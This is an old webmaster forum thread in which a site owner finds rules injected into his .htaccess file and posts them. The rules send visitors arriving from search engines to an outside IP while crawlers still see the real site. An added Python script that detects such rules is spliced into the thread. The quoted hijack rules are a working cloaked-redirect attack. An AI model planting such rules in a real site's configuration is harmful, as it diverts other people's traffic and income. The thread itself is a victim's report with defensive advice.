.htaccess Hijacking Search Engine Traffic

.htaccess hacked

     

josjongejan

6:39 pm on Feb 12, 2009 (gmt 0)

5+ Year Member



If you suddenly find your traffic dropping over 90% and upon investigating find out that

- Your site loads fine
- Your DNS / host is fine
- Your rankings haven't changed
- All your search engine traffic is gone and remaining traffic is mostly direct visitors or referrals from a non-search engine site?

Well that's what happened to me.

Upon investigating, I found out the following was added to my .htaccess file:

RewriteCond %{HTTP_REFERER} ^.*(google\.|msn\.|live\.com|yahoo\.|altavista\.|aol\.|ask\.|eureka\.com|lycos\.com|hotbot\.com|infoseek\.com|webcrawler\.|excite\.|netscape\.com|mamma\.com|alltheweb\.com|northernlight\.com|rambler\.ru|aport\.ru|yandex\.ru|pingwin\.ru|www\.ru|punto\.ru|search\.comcast\.net|abcsok\.no|myspace\.com|looksmart\.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]

RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://<ip removed>

My .htaccess file is not chmodded 777 or anything crazy nor are any other files/folders on my ftp.
I also don't use any open source software (e.g. wordpress, vbulletin, etc.)

I have no clue why this happened to me. I googled the ip address and only found 1 other site that this happened to.

I hope this doesn't happen to you but if it did and you googled the ip I hope you find this thread so you can resolve the issue quickly.

It took me 3 days to figure this out and I lost a lot of traffic and consequently income from this little hijack.

I have asked my host to scan the server for rootkits and I changed my ftp password.

I am still seeking an explanation for how this code ended up in my .htaccess though so any information that may lead to that answer is greatly appreciated.

[edited by: physics at 9:21 pm (utc) on Feb. 12, 2009]

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] IP address removed. No specifics please. [/edit]
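
A check for the kind of injected rules quoted in the post above, as an added example that is not part of the original thread: it flags .htaccess directives conditioned on a search-engine referrer or a crawler user agent, and redirects to hosts you do not own. The function name, the `own_hosts` parameter and the sample input are assumptions made for illustration.

```python
import re

# Search-engine names: a subset of those in the injected rule quoted in the post.
ENGINES = r"google|msn|live|yahoo|altavista|aol|ask|lycos|yandex|rambler"
REFERER_COND = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(?:" + ENGINES + r")", re.I)
AGENT_COND = re.compile(
    r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}\s+\S*(?:bot|slurp|crawl|spider)", re.I)
# Redirect / RedirectMatch / RewriteRule whose target is an absolute URL.
EXTERNAL = re.compile(
    r"^\s*(?:Redirect(?:Match|Permanent|Temp)?|RewriteRule)\s+.*?\bhttps?://([^\s/\"]+)",
    re.I)

def audit_htaccess(text, own_hosts=()):
    """Return (line_no, reason, line) for directives worth a manual look."""
    own = {h.lower() for h in own_hosts}
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if REFERER_COND.match(line):
            findings.append((no, "condition on search-engine referrer", line))
        elif AGENT_COND.match(line):
            findings.append((no, "condition on crawler user agent", line))
        else:
            m = EXTERNAL.match(line)
            if m and m.group(1).lower() not in own:
                findings.append((no, "redirect to external host " + m.group(1), line))
    return findings

# Constructed sample: a legitimate canonical-host rule followed by rules shaped
# like the injected ones. 192.0.2.10 is a documentation address (placeholder).
SAMPLE = r"""
RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(google\.|msn\.|yahoo\.).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]
RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://192.0.2.10
"""

if __name__ == "__main__":
    for no, reason, line in audit_htaccess(SAMPLE, own_hosts=["www.example.com"]):
        print(f"line {no}: {reason}: {line}")
```

Run it on a schedule against every .htaccess under the document root and compare the result with a known-good copy; a new finding means the file changed outside your own deployments.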

jdMorgan

8:46 pm on Feb 12, 2009 (gmt 0)

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member



We had a thread here recently where a victim of a similar exploit found malware on his own PC that may have allowed his server login info to be captured from his PC and reported to persons unknown. He had found code very similar to what you posted above in his .htaccess file.

The code on his site shared some similarity to what you posted here, in that it was poorly-coded, and probably didn't work quite as intended.

Jim

physics

9:33 pm on Feb 12, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



josjongejan, what OS is your site running on?
Are you using cpanel?
As jdMorgan mentioned maybe the exploit came from your PC. Did you try running a full virus scan?

josjongejan

4:43 am on Feb 13, 2009 (gmt 0)

5+ Year Member



It's a cPanel server from [snip] not sure on the platform but I'm guessing it's either Linux or FreeBSD

Just did a full scan with McAfee latest definitions too, nothing found.

In my 12 years online I've never been infected by a virus, I'm pretty careful/aware

Thanks for the replies so far, I appreciate your time and effort

[edited by: phranque at 7:56 am (utc) on Feb. 13, 2009]
[edit reason] No urls, please. See TOS [webmasterworld.com] [/edit]
